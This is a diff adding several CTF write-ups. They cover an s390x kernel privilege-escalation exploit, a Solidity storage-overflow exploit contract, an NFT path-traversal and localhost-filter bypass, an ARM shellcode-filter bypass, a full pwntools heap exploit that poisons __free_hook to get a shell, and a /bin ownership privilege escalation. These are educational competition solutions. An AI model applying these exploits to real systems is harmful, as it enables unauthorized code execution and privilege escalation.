+**Authors** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags**: pwn, kernel, mainframe, s390
+
+**Points**: 500 (1 solve)
+
+> one_gadget? kone_gadget? [THREE NINETY GADGET!!!](https://ctf.bi.zone/files/three_ninety_gadget_824de25c9ea8a326964a4d1cb5c0e98ed2506416e13093334cc07dc69beb23d7.tar.xz) nc three_ninety_gadget.ctfz.one 390
+
+## Analysis
+
+This challenge is basically `kone_gadget` from SECCON 2021 (writeup [here](../../SECCON-2021/pwn/kone_gadget)) ported to s390x.
+
+Like in the original challenge, the author patched the kernel to add a new syscall:
+
+```c
+SYSCALL_DEFINE1(s390_gadget, unsigned long, pc)
+{
+ register unsigned long r14 asm("14") = pc;
+ asm volatile("xgr %%r0,%%r0\n"
+ "xgr %%r1,%%r1\n"
+ "xgr %%r2,%%r2\n"
+ "xgr %%r3,%%r3\n"
+ "xgr %%r4,%%r4\n"
+ "xgr %%r5,%%r5\n"
+ "xgr %%r6,%%r6\n"
+ "xgr %%r7,%%r7\n"
+ "xgr %%r8,%%r8\n"
+ "xgr %%r9,%%r9\n"
+ "xgr %%r10,%%r10\n"
+ "xgr %%r11,%%r11\n"
+ "xgr %%r12,%%r12\n"
+ "xgr %%r13,%%r13\n"
+ "xgr %%r15,%%r15\n"
+ ".machine push\n"
+ ".machine z13\n"
+ "vzero %%v0\n"
+ "vzero %%v1\n"
+ "vzero %%v2\n"
+ "vzero %%v3\n"
+ "vzero %%v4\n"
+ "vzero %%v5\n"
+ "vzero %%v6\n"
+ "vzero %%v7\n"
+ "vzero %%v8\n"
+ "vzero %%v9\n"
+ "vzero %%v10\n"
+ "vzero %%v11\n"
+ "vzero %%v12\n"
+ "vzero %%v13\n"
+ "vzero %%v14\n"
+ "vzero %%v15\n"
+ "vzero %%v16\n"
+ "vzero %%v17\n"
+ "vzero %%v18\n"
+ "vzero %%v19\n"
+ "vzero %%v20\n"
+ "vzero %%v21\n"
+ "vzero %%v22\n"
+ "vzero %%v23\n"
+ "vzero %%v24\n"
+ "vzero %%v25\n"
+ "vzero %%v26\n"
+ "vzero %%v27\n"
+ "vzero %%v28\n"
+ "vzero %%v29\n"
+ "vzero %%v30\n"
+ "vzero %%v31\n"
+ ".machine pop\n"
+ "br %0"
+ : : "r" (r14));
+ unreachable();
+}
+```
+
+The custom syscall zeroes every general-purpose register and then jumps to an
+address chosen by us. Somehow we have to use this to become root.
+
+What makes this challenge difficult is that we have to write a kernel exploit for a fairly obscure architecture that no one on the team had seen before, and which is not supported by most of the tools we normally use (pwndbg, gef, vmlinux-to-elf, etc...).
+
+## Exploitation
+
+The first thing I tried was to replicate the solution we used for the original
+challenge at SECCON. Unfortunately that doesn't work because the root filesystem
+is no longer in an initramfs but in an ext2 disk. The flag is no longer in memory
+and we would need to read from the disk first.
+
+I also tried to use the intended solution for the original challenge (inject
+shellcode in the kernel by using the eBPF JIT), but...
+
+```
+/ $ /pwn
+seccomp: Function not implemented
+```
+
+it looks like the challenge kernel is compiled without eBPF or seccomp, so we
+can't use that to inject shellcode either.
+
+I also tried to load some shellcode in userspace, and then jump to it
+
+```
+[ 4.215891] Kernel stack overflow.
+[ 4.216147] CPU: 1 PID: 43 Comm: pwn Not tainted 5.18.10 #1
+[ 4.216363] Hardware name: QEMU 3906 QEMU (KVM/Linux)
+[ 4.216532] Krnl PSW : 0704c00180000000 0000000001000a62 (0x1000a62)
+[ 4.216964] R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3
+[ 4.217079] Krnl GPRS: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217140] 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217196] 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+[ 4.217251] 0000000000000000 0000000000000000 0000000001000a60 0000000000000000
+[ 4.218310] Krnl Code: 0000000001000a5c: 0000 illegal
+[ 4.218310] 0000000001000a5e: 0000 illegal
+[ 4.218310] #0000000001000a60: 0000 illegal
+[ 4.218310] >0000000001000a62: 0000 illegal
+[ 4.218310] 0000000001000a64: 0000 illegal
+[ 4.218310] 0000000001000a66: 0000 illegal
+[ 4.218310] 0000000001000a68: 0000 illegal
+[ 4.218310] 0000000001000a6a: 0000 illegal
+[ 4.218850] Call Trace:
+[ 4.219231] [<00000000001144de>] show_regs+0x4e/0x80
+[ 4.219718] [<000000000010196a>] kernel_stack_overflow+0x3a/0x50
+[ 4.219780] [<0000000000000200>] 0x200
+[ 4.219958] Last Breaking-Event-Address:
+[ 4.219996] [<0000000000000000>] 0x0
+[ 4.220445] Kernel panic - not syncing: Corrupt kernel stack, can't continue.
+[ 4.220652] CPU: 1 PID: 43 Comm: pwn Not tainted 5.18.10 #1
+[ 4.220727] Hardware name: QEMU 3906 QEMU (KVM/Linux)
+[ 4.220792] Call Trace:
+[ 4.220816] [<00000000004ce1a2>] dump_stack_lvl+0x62/0x80
+[ 4.220879] [<00000000004c4d16>] panic+0x10e/0x2d8
+[ 4.220933] [<0000000000101980>] s390_next_event+0x0/0x40
+[ 4.220986] [<0000000000000200>] 0x200
+```
+
+Unfortunately that didn't work either. At this point I started reading more about
+the architecture that the challenge it's running on. I found [this page](https://www.kernel.org/doc/html/v5.3/s390/debugging390.html) from the
+Linux kernel documentation, as well as IBM's manual useful.
+
+As it turns out, on z/Architecture the kernel and userspace programs run in
+completely different address spaces. Userspace memory is simply not accessible
+from kernel mode without using special instructions and we cannot jump to
+shellcode there.
+
+At this point I was out of ideas and I started looking at the implementation of
+Linux's system call handler for inspiration. One thing that I found interesting
+is that the system call handler reads information such as the kernel stack
+from a special page located at address zero. The structure of this special zero
+page (lowcore) is described in [this Linux header file](https://elixir.bootlin.com/linux/latest/source/arch/s390/include/asm/lowcore.h).
+
+Interestingly enough on this architecture, or at least on the version emulated by
+QEMU, all memory is executable. Linux's system call handler even jumps to a
+location in the zero page to return to userspace. If we could place some
+controlled data somewhere, we could just jump to it to get arbitrary code
+execution in the kernel.
+
+At some point I started looking at the contents of the zero page in gdb and I
+realized that there _is_ some memory that we could control there and use as
+shellcode. For example `save_area_sync` at offset 0x200 contains the values of
+registers r8-r15 before the system call. The values of those registers are completely
+controlled by us in userspace. What if we placed some shellcode in the registers
+and jumped to it? I used a very similar idea to solve [kernote](../../0CTF-2021-finals/pwn/kernote) from the 0CTF 2021 finals
+except this time instead of merely using the saved registers as a ROP chain,
+they're actually executable and we can use them to store actual shellcode!
+
+We only have 64 bytes of space for the shellcode, which isn't a lot but should
+be enough for a small snippet that gives us root and returns to userspace.
+
+The zero page even contains a pointer to the current task, and we can use that
+to find a pointer to our process's creds structure and zero the uid to get root.
+
+Here is the full exploit:
+
+```
+.section .text
+.globl _start
+.type _start, @function
+_start:
+ larl %r5, shellcode
+ lg %r8, 0(%r5)
+ lg %r9, 8(%r5)
+ lg %r10, 16(%r5)
+ lg %r11, 24(%r5)
+ lg %r12, 32(%r5)
+ lg %r13, 40(%r5)
+ lg %r14, 48(%r5)
+ lg %r15, 56(%r5)
+ lghi %r1, 390
+ lghi %r2, 0x200
+ svc 0
+
+userret:
+ # Launch a shell
+ lghi %r1, 11
+ larl %r2, binsh
+ larl %r3, binsh_argv
+ lghi %r4, 0
+ svc 11
+
+binsh:
+ .asciz "/bin/sh"
+
+binsh_argv:
+ .quad binsh
+ .quad 0
+
+.align 16
+shellcode:
+ lg %r12, 0x340
+ lg %r15, 0x348
+
+ # Zero the creds
+ lghi %r0, 0
+ lg %r1, 0x810(%r12)
+ stg %r0, 4(%r1)
+
+ # Return to userspace
+ lctlg %c1, %c1, 0x390
+ stpt 0x2C8
+ lpswe 0x200 + pswe - shellcode
+
+.align 16
+pswe:
+ # Copied from gdb
+ .quad 0x0705200180000000
+ .quad userret
+```
+
+Flag: `CTFZone{pls_only_l0wcor3_m3th0d_n0__nintend3d_kthxbye}`
\ No newline at end of file
diff --git a/Codegate-2022-quals/blockchain/ankiwoom.html b/Codegate-2022-quals/blockchain/ankiwoom.html
new file mode 100755
index 0000000..fcf97d2
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/ankiwoom.html
@@ -0,0 +1,263 @@
+
+
+
+
+
+Ankiwoom Invest | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
What do you think about if stock-exchange server is running on blockchain? Can you buy codegate stock?
+
+
service: nc 13.125.194.44 20000
+
+
rpc: http://13.125.194.44:8545
+
+
faucet: http://13.125.194.44:8080
+
+
network info: mainnet, petersburg
+
+
+
The info struct in the Proxy contract overlaps with the storage slot of the donaters dynamic array in the Investment contract. This means that whenever info is written, if overwrites the length of donaters and hence we can achieve an out-of-bounds write. Observe that since the msg.sender address is written to the upper part of the length, we are likely to have enough reach to overwrite arbitrary interesting storage variables and in particular target our own balance.
+Since we need an “invalid” lastDonater when using modifyDonater, we have to make sure that the lastDonater slot contains the address of a contract and a regular user address. That introduces the problem that we need to look like a regular address when performing the donation. To get around it, we can simply perform the setup and donation in the constructor of our contract, before we can be observed to have any nonzero extcodesize. Afterwards, we do the final steps from a regular contract function so that then the extcodesize is no longer seen as 0.
+
+
Some calculation on the storage addresses, a lot of fighting with the interaction with the RPC, and hoping our contract address is large enough to span the gap later, we get the flag.
+
+
Exploit contract:
+
import{Investment}from"./Investment.sol";
+import{Proxy}from"./Proxy.sol";
+
+contractSploit{
+ Investmenttarget;
+
+ constructor(Investment_t){
+ target=_t;
+ target.init();
+ // Get some moneh
+target.mint();
+ // Buy stonks to donate
+target.buyStock("amd",1);
+ // Donate so we have a contract lastDonater and can modifyDonater
+// Do it in the constructor so somehow it seems like we're a user
+target.donateStock(address(this),"amd",1);
+ }
+ fallback()externalpayable{}
+
+ functioncontinuesploit()public{
+ target.modifyDonater(1);// no clue if this was needed, probably not but I added it before the solution suddenly started to work ¯\_(ツ)_/¯
+
+ // Modify stuff, now we're a contract and no longer a user :)
+uint256base_address=uint256(keccak256(abi.encode(uint256(2))));// donaters
+uint256mapping_slot=7;// Balances
+addressmapping_key=address(this);
+ uint256goal=uint256(keccak256(abi.encode(mapping_key,mapping_slot)));
+
+ require(goal>base_address,"Wrong overflow");
+
+ target.modifyDonater(goal-base_address);
+ target.buyStock("codegate",1);
+ target.isSolved();
+ }
+}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/blockchain/ankiwoom.md b/Codegate-2022-quals/blockchain/ankiwoom.md
new file mode 100755
index 0000000..638aa7d
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/ankiwoom.md
@@ -0,0 +1,63 @@
+# Ankiwoom Invest
+
+**Author**: Robin_Jadoul
+
+**Tags:** blockchain
+
+**Points:** 964 (11 solves)
+
+**Description:**
+
+> What do you think about if stock-exchange server is running on blockchain? Can you buy codegate stock?
+>
+> service: nc 13.125.194.44 20000
+>
+> rpc: http://13.125.194.44:8545
+>
+> faucet: http://13.125.194.44:8080
+>
+> network info: mainnet, petersburg
+
+The `info` struct in the `Proxy` contract overlaps with the storage slot of the `donaters` dynamic array in the `Investment` contract. This means that whenever `info` is written, if overwrites the length of `donaters` and hence we can achieve an out-of-bounds write. Observe that since the `msg.sender` address is written to the upper part of the length, we are likely to have enough reach to overwrite arbitrary interesting storage variables and in particular target our own balance.
+Since we need an "invalid" `lastDonater` when using `modifyDonater`, we have to make sure that the `lastDonater` slot contains the address of a contract and a regular user address. That introduces the problem that we need to look like a regular address when performing the donation. To get around it, we can simply perform the setup and donation in the constructor of our contract, before we can be observed to have any nonzero `extcodesize`. Afterwards, we do the final steps from a regular contract function so that then the extcodesize is no longer seen as 0.
+
+Some calculation on the storage addresses, a lot of fighting with the interaction with the RPC, and hoping our contract address is large enough to span the gap later, we get the flag.
+
+**Exploit contract:**
+```solidity
+import {Investment} from "./Investment.sol";
+import {Proxy} from "./Proxy.sol";
+
+contract Sploit {
+ Investment target;
+
+ constructor(Investment _t) {
+ target = _t;
+ target.init();
+ // Get some moneh
+ target.mint();
+ // Buy stonks to donate
+ target.buyStock("amd", 1);
+ // Donate so we have a contract lastDonater and can modifyDonater
+ // Do it in the constructor so somehow it seems like we're a user
+ target.donateStock(address(this), "amd", 1);
+ }
+ fallback() external payable {}
+
+ function continuesploit() public {
+ target.modifyDonater(1); // no clue if this was needed, probably not but I added it before the solution suddenly started to work ¯\_(ツ)_/¯
+
+ // Modify stuff, now we're a contract and no longer a user :)
+ uint256 base_address = uint256(keccak256(abi.encode(uint256(2)))); // donaters
+ uint256 mapping_slot = 7; // Balances
+ address mapping_key = address(this);
+ uint256 goal = uint256(keccak256(abi.encode(mapping_key, mapping_slot)));
+
+ require(goal > base_address, "Wrong overflow");
+
+ target.modifyDonater(goal - base_address);
+ target.buyStock("codegate", 1);
+ target.isSolved();
+ }
+}
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/blockchain/nft.html b/Codegate-2022-quals/blockchain/nft.html
new file mode 100755
index 0000000..0729ea4
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/nft.html
@@ -0,0 +1,248 @@
+
+
+
+
+
+NFT | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
This is mostly a web challenge with a bit of blockchain flavor. We observe that part of the token URI is directly fed into os.path.join after stripping away a prefix. Reading the documentation, we see that
+
+
+
If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
+
+
+
so we can get an absolute path out of it. The only obstacle remaining at this point is to find an IP address that:
+
+
+
starts with a digit but not a 0
+
doesn’t contain 127.0.0.1 or 0.0.0.0
+
but is equivalent to 127.0.0.1 or 0.0.0.0
+
+
+
To this end, we see that in the python version used, the ipaddress module was still fairly naive, and didn’t allow e.g. a numeric IP, unfortunately. On the flip side, it didn’t check for leading zeroes in octets yet either, so we can abuse that to have 127.0.0.01 as our IP instead and pass the checks.
+
+
To perform the actual exploit:
+
+
+
Create an account and login
+
Mint an NFT with tokenURI set to 127.0.0.01/account/storages//home/ctf/flag.txt with the private key of the account
+
visit the NFT listing for the account
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/blockchain/nft.md b/Codegate-2022-quals/blockchain/nft.md
new file mode 100755
index 0000000..8e7666b
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/nft.md
@@ -0,0 +1,41 @@
+# NFT
+
+**Author**: Robin_Jadoul
+
+**Tags:** blockchain
+
+**Points:** 907 (17 solves)
+
+**Description:**
+
+> NFT should work as having a deeply interaction with third-party like https://opensea.io/
+>
+> We all know that blockchain is opened to all, which give us some guaranty thus it will work as we expected, however can we trust all this things?
+>
+> contract: 0x4e2daa29B440EdA4c044b3422B990C718DF7391c
+>
+> service: http://13.124.97.208:1234
+>
+> rpc: http://13.124.97.208:8545/
+>
+> faucet: http://13.124.97.208:8080
+>
+> network info: mainnet, petersburg
+
+This is mostly a web challenge with a bit of blockchain flavor. We observe that part of the token URI is directly fed into `os.path.join` after stripping away a prefix. Reading [the documentation](https://docs.python.org/3/library/os.path.html#os.path.join), we see that
+
+> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
+
+so we can get an absolute path out of it. The only obstacle remaining at this point is to find an IP address that:
+
+- starts with a digit but not a 0
+- doesn't contain `127.0.0.1` or `0.0.0.0`
+- but is equivalent to `127.0.0.1` or `0.0.0.0`
+
+To this end, we see that in the python version used, the `ipaddress` module was still fairly naive, and didn't allow e.g. a numeric IP, unfortunately. On the flip side, it didn't check for leading zeroes in octets yet either, so we can abuse that to have `127.0.0.01` as our IP instead and pass the checks.
+
+To perform the actual exploit:
+
+- Create an account and login
+- Mint an NFT with tokenURI set to `127.0.0.01/account/storages//home/ctf/flag.txt` with the private key of the account
+- visit the NFT listing for the account
\ No newline at end of file
diff --git a/Codegate-2022-quals/index.html b/Codegate-2022-quals/index.html
new file mode 100755
index 0000000..06914d5
--- /dev/null
+++ b/Codegate-2022-quals/index.html
@@ -0,0 +1,260 @@
+
+
+
+
+
+Codegate CTF 2022 Qualifiers | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Welcome! Here is my Emulator. It can use only human.
+
+
Always SMiLEY :)
+
+
+
This challenge is an ARM binary running in qemu-user. The challenge asks us to input up to 4k of ARM machine code, then gives us a choice between running the code, printing it, or replacing it with new code.
If the verification succeeds, the binary runs our shellcode.
+
+
The run function is presumably trying to prevent our shellcode from doing something fishy like launching a shell. However I don’t know for sure becauase I didn’t actually reverse the checks.
+
+
Instead I noticed that the verification succeeds immediately when it encounters an instruction that encodes to 0. 0 is a valid ARM instruction that is essentially a nop (andeq r0, r0, r0). This means that we can easily bypass all the checks by prefixing our shellcode with this instruction.
The challenge binary implements a virtual filesystem where you could create and manage
+“files” in memory through a console menu smelling like an heap challenge. The process
+forked right away and let the child and parent process communicate through local sockets.
+The parent process provided the user interface which lets the user explore the virtual
+filesystem and send “system calls” through to the child process, which kept the actual
+list of virtual files.
+
+
Overview
+
After reversing both the parent process, we come to the following vfile struct, which
+is created and filled with user provided data in the client itself. So the parent process
+always keeps one copy of a “selected” vfile in memory to change the metadata and file content
+of before committing it to the child process when asked to.
The client process opens a flag.v and README.md.v file on start and links it into a global
+doubly-linked list where the parent process can append and delete files from. The struct looks
+something like this, but we only needed the parent process for our exploit.
You can select and print that flag.v file through the client menu, but it only tells you to
+get a shell to read the real flag file.
+
+
The Bug
+
When editing a virtual file’s contents, the total_size field isn’t updated [1] but only the
+filesize field is [4]. Since the two fields were used in different contexts in the logic,
+the inconsistency first allowed us to leak a libc address.
When changing the content of an existing file like flag.v to some longer value and saving it
+to the child process, the total_size field is used to determine the size of the struct and
+thus truncates it on the child process. After loading the same file again, the smaller total_size
+is used to malloc a buffer for it. Printing the contents of a file uses the larger filesize field
+and leaks the heap memory after the vfile_format struct containing libc addresses.
+
+
To turn this into an arbitrary write primitive, we created a file with longer content and correct
+large total_size set. Then edit the contents again to a smaller value. We malloc a smaller
+chunk in [2], but still memcpy the whole old struct over the smaller buffer. [3]
+This allowed us to overflow the heap buffer and into another free tcache chunk we placed there
+through some heap fengshui. The target chunk had to be smaller than 0x100 in size, since we’ll
+use the filename as a trigger which had that size limit.
+
+
To actually fix up the total_size field after changing the contents we resorted to changing
+the filename, since that menu option recalculated and updated the total_size to match the
+set filesize:
Since we’re dealing with libc 2.27, which lacks tcache sanity checks, the plan was to plant
+__free_hook into the fd field of a free tcache chunk to let malloc return that address
+and overwrite it with a magic gadget to get a shell. A lot of the logic used calloc to
+allocate memory though, which doesn’t use the tcache. So many steps of the exploit dance
+around this limitation by using the few controllable malloc calls repeatedly.
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/filev.md b/Codegate-2022-quals/pwn/filev.md
new file mode 100755
index 0000000..d95c3a5
--- /dev/null
+++ b/Codegate-2022-quals/pwn/filev.md
@@ -0,0 +1,316 @@
+# File-v
+
+**Authors**: Peace-Maker, pql
+
+**Tags:** pwn
+
+**Points:** 957 (12 solves)
+
+**Description:**
+
+> Thanks for using J-DRIVE!!!!
+
+The challenge binary implements a virtual filesystem where you could create and manage
+"files" in memory through a console menu smelling like an heap challenge. The process
+forked right away and let the child and parent process communicate through local sockets.
+The parent process provided the user interface which lets the user explore the virtual
+filesystem and send "system calls" through to the child process, which kept the actual
+list of virtual files.
+
+#### Overview
+After reversing both the parent process, we come to the following vfile struct, which
+is created and filled with user provided data in the client itself. So the parent process
+always keeps one copy of a "selected" vfile in memory to change the metadata and file content
+of before committing it to the child process when asked to.
+
+```c
+struct vfile_format
+{
+ unsigned int total_size; // filename_size + filesize + 25
+ unsigned int color_idx;
+ unsigned int created_time;
+ unsigned int modified_time;
+ unsigned int filename_size;
+ unsigned int filesize;
+ char filename[];
+};
+```
+
+The client process opens a `flag.v` and `README.md.v` file on start and links it into a global
+doubly-linked list where the parent process can append and delete files from. The struct looks
+something like this, but we only needed the parent process for our exploit.
+
+```c
+struct vfile
+{
+ struct vfile_format *data;
+ struct vfile *prev;
+ struct vfile *next;
+};
+```
+
+You can select and print that `flag.v` file through the client menu, but it only tells you to
+get a shell to read the real `flag` file.
+
+#### The Bug
+When editing a virtual file's contents, the `total_size` field isn't updated [1] but only the
+`filesize` field is [4]. Since the two fields were used in different contexts in the logic,
+the inconsistency first allowed us to leak a libc address.
+
+```c
+__printf_chk(1LL, "Enter content: ");
+new_content = read_line(filesize);
+total_size = selected_vfile->total_size; // [1]
+new_content2 = new_content;
+new_filestruct = (vfile_format *)malloc(selected_vfile->total_size - selected_vfile->filesize + filesize); // [2]
+memcpy(new_filestruct, selected_vfile, total_size); // [3]
+new_filestruct->modified_time = time(0LL);
+filename_size = new_filestruct->filename_size;
+new_filestruct->filesize = filesize; // [4]
+memcpy(&new_filestruct->filename[filename_size + 1], new_content2, filesize);
+free(selected_vfile);
+free(new_content2);
+```
+
+#### The Exploit
+When changing the content of an existing file like `flag.v` to some longer value and saving it
+to the child process, the `total_size` field is used to determine the size of the struct and
+thus truncates it on the child process. After loading the same file again, the smaller `total_size`
+is used to `malloc` a buffer for it. Printing the contents of a file uses the larger `filesize` field
+and leaks the heap memory after the `vfile_format` struct containing libc addresses.
+
+To turn this into an arbitrary write primitive, we created a file with longer content and correct
+large `total_size` set. Then edit the contents again to a smaller value. We `malloc` a smaller
+chunk in [2], but still `memcpy` the whole old struct over the smaller buffer. [3]
+This allowed us to overflow the heap buffer and into another free tcache chunk we placed there
+through some heap fengshui. The target chunk had to be smaller than 0x100 in size, since we'll
+use the filename as a trigger which had that size limit.
+
+To actually fix up the `total_size` field after changing the contents we resorted to changing
+the filename, since that menu option recalculated and updated the `total_size` to match the
+set `filesize`:
+
+```c
+total_size = file_data_struct->filesize + new_filename_len + 25;
+new_vfile = (vfile_format *)calloc(total_size, 1uLL);
+new_vfile->total_size = total_size;
+```
+
+Since we're dealing with libc 2.27, which lacks tcache sanity checks, the plan was to plant
+`__free_hook` into the `fd` field of a free tcache chunk to let `malloc` return that address
+and overwrite it with a magic gadget to get a shell. A lot of the logic used `calloc` to
+allocate memory though, which doesn't use the tcache. So many steps of the exploit dance
+around this limitation by using the few controllable `malloc` calls repeatedly.
+
+```python
+#!/usr/bin/env python3
+from pwn import *
+
+# context.terminal = ["terminator", "-e"]
+
+BINARY_NAME = "./file-v-new"
+LIBC_NAME = "./libc.so"
+REMOTE = ("3.36.184.9", 5555)
+
+context.binary = BINARY_NAME
+binary = context.binary
+libc = ELF(LIBC_NAME)
+
+EXEC_STR = [binary.path]
+
+PIE_ENABLED = binary.pie
+
+BREAKPOINTS = [int(x, 16) for x in args.BREAK.split(',')] if args.BREAK else []
+
+gdbscript_break = '\n'.join([f"brva {hex(x)}" for x in BREAKPOINTS])
+
+gdbscript = \
+ """
+ # GDBSCRIPT here
+ set follow-fork-mode parent
+ continue
+ """
+
+
+def handle():
+
+ env = {"LD_PRELOAD": libc.path}
+
+ if args.REMOTE:
+ return remote(*REMOTE)
+
+ elif args.LOCAL:
+ if args.GDB:
+ p = gdb.debug(EXEC_STR, env=env, gdbscript=gdbscript_break + gdbscript)
+ else:
+ p = process(EXEC_STR, env=env)
+ else:
+ error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+ # if args.STRACE:
+ # subprocess.Popen([*context.terminal, f"strace -p {p.pid}; cat"])
+ # input("Waiting for enter...")
+
+ return p
+
+def recvmenu(l):
+ l.recvuntil(b"> ")
+
+
+def do_create_file(l, filename, filename_len=None):
+ recvmenu(l)
+
+ if filename_len == None:
+ filename_len = len(filename)
+
+ l.sendline(b'c')
+ l.sendlineafter(b"Enter the length of filename:", str(filename_len).encode())
+ l.sendlineafter(b"Enter filename: ", filename)
+
+def do_select_file(l, filename):
+ recvmenu(l)
+ l.sendline(b'b')
+ l.sendlineafter(b"Enter filename: ", filename)
+ response = l.recvline()
+ if response == b'Failed to find the file\n':
+ return None
+
+ l.recvuntil(b"Filename \t\t")
+ filename = l.recvuntil(b"\nSize \t\t", drop=True)
+ size = l.recvuntil(b"\nCreated Time\t\t", drop=True)
+ created_time = l.recvuntil(b"\nModified Time\t\t", drop=True)
+ modified_time = l.recvuntil(b"\n-------------------------------------------------------\n", drop=True)
+
+ return {
+ "filename": filename,
+ "size": size,
+ "created_time": created_time,
+ "modified_time": modified_time
+ }
+
+def select_do_change_name(l, filename, filename_size=None):
+ if filename_size == None:
+ filename_size = len(filename)
+
+ recvmenu(l)
+ l.sendline(b"1")
+ l.sendlineafter(b"Enter the length of filename: ", str(filename_size).encode())
+ l.sendafter(b"Enter filename: ", filename)
+
+def select_do_change_content(l, content, content_size=None):
+
+ if content_size == None:
+ content_size = len(content)
+
+ recvmenu(l)
+ l.sendline(b"4")
+ l.sendlineafter(b"Enter the size of content: ", str(content_size).encode())
+ l.sendafter(b"Enter content: ", content)
+
+def select_do_get_content(l):
+ recvmenu(l)
+ l.sendline(b"3")
+
+ results = bytearray(0)
+
+ while True:
+ l.recvuntil(b' | ')
+
+ bs = l.recvuntil(b'|', drop=True).decode().split(' ')[:-1]
+
+ if len(bs) == 0:
+ break
+
+ bs = bytearray(map(lambda x: bytes.fromhex(x)[0], bs))
+ results += bs
+
+ l.recvuntil(b'\n')
+
+ return results
+
+
+def select_do_save_changes(l):
+ recvmenu(l)
+ l.sendline(b'5')
+
+def select_do_back(l, save=False):
+ recvmenu(l)
+ l.sendline(b'b')
+ n = l.recvn(5)
+ # print('=====', n)
+ if n == b"Won't":
+ if save:
+ l.sendline(b'Y')
+ else:
+ l.sendline(b'N')
+
+def select_do_delete(l):
+ recvmenu(l)
+ l.sendline(b'd')
+
+def main():
+ l = handle()
+
+ l.recvuntil(b"-------------------------- MENU ---------------------------")
+
+ file = do_select_file(l, b"flag")
+ print(file)
+
+ select_do_change_content(l, b"A"*0x100)
+ select_do_save_changes(l)
+ select_do_back(l)
+
+ do_select_file(l, b"flag")
+
+ oobr = select_do_get_content(l)
+ # print(hexdump(oobr))
+
+ libc_leak = u64(oobr[0xab:0xab+8])
+ log.info('libc leak: %#x', libc_leak)
+ libc_base = libc_leak - 0x3ec680 # libc.sym._IO_2_1_stderr_
+ log.info("libc base: %#x", libc_base)
+ libc.address = libc_base
+
+ select_do_back(l)
+
+ do_create_file(l, b'H'*0xc0)
+ do_select_file(l, b'H'*0xc0)
+ select_do_change_content(l, cyclic(0xc0))
+ select_do_change_name(l, b'hi')
+ select_do_save_changes(l)
+ select_do_change_content(l, b'A'*0x130)
+ select_do_back(l)
+ log.info('heap groomed')
+
+ do_create_file(l, b'meh')
+ do_select_file(l, b'meh')
+ payload = fit({
+ 0xd0-39: p64(0x21) + b'/etc/localtime\x00',
+ 0xf0-39: p64(0xf1) + p64(0),
+ 0x1e0-39: p64(0x1b1) + p64(0),
+ 0x390-39: p64(0xf1) + p64(libc.sym.__free_hook),
+ }, length=0x400)
+ select_do_change_content(l, payload)
+ select_do_change_name(l, b'ho')
+ select_do_change_content(l, b'B'*(0xd0-25-2-0x10))
+ select_do_delete(l)
+ log.info('planted free_hook')
+
+ do_select_file(l, b'README.md')
+ select_do_change_name(l, b'W'*0xd0)
+ select_do_save_changes(l)
+ # select_do_back(l)
+ # select_do_delete(l)
+ one_gadget = libc_base + 0x10a41c # 0x4f3d5 0x4f432
+ select_do_change_name(l, p64(one_gadget).ljust(0xe0, b'\x00'))
+ log.success('enjoy your shell')
+ # select_do_save_changes(l)
+
+ l.sendline(b'id;cat f*;cat /home/ctf/f*')
+
+ l.interactive()
+
+
+if __name__ == "__main__":
+ main()
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/pwn/forgotten.html b/Codegate-2022-quals/pwn/forgotten.html
new file mode 100755
index 0000000..86e7f67
--- /dev/null
+++ b/Codegate-2022-quals/pwn/forgotten.html
@@ -0,0 +1,264 @@
+
+
+
+
+
+Forgotten | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
The challenge files contain a Linux VM (kernel image + initramfs) and a customized Qemu. The Qemu patch is included and adds a custom PCI device. The challenge also includes a driver (1153 lines of C) for the custom device, which is built into the kernel. The flag is in the initramfs, and can only be read by root.
+
+
We have access to an unprivileged shell, and the intended solution is to become root by exploiting memory corruption in the custom driver.
+
+
Fortunately for us there is also a much easier way to solve this challenge:
+
+
Initialization is done. Enjoy :)
+/ $ ls -la
+...
+drwxrwxr-x 2 user user 0 Nov 22 07:37 bin
+...
+
+
+
The /bin directory is owned by our user 👀. It appears that the author has… forgotten… to change the owner of some directories to root. That means that we can delete and create files there. At boot the VM executes the following init script as root:
The script invokes umount (/bin/umount) and poweroff (/bin/poweroff) as root after our unprivileged shell exits. Since we own /bin, we can simply delete /bin/umount and replace it with a script that prints the flag.
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/forgotten.md b/Codegate-2022-quals/pwn/forgotten.md
new file mode 100755
index 0000000..18f2aed
--- /dev/null
+++ b/Codegate-2022-quals/pwn/forgotten.md
@@ -0,0 +1,66 @@
+# Forgotten
+
+**Author**: [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn
+
+**Points:** 1000 (1 solve)
+
+**Description:**
+
+> i'm live in the wild.
+
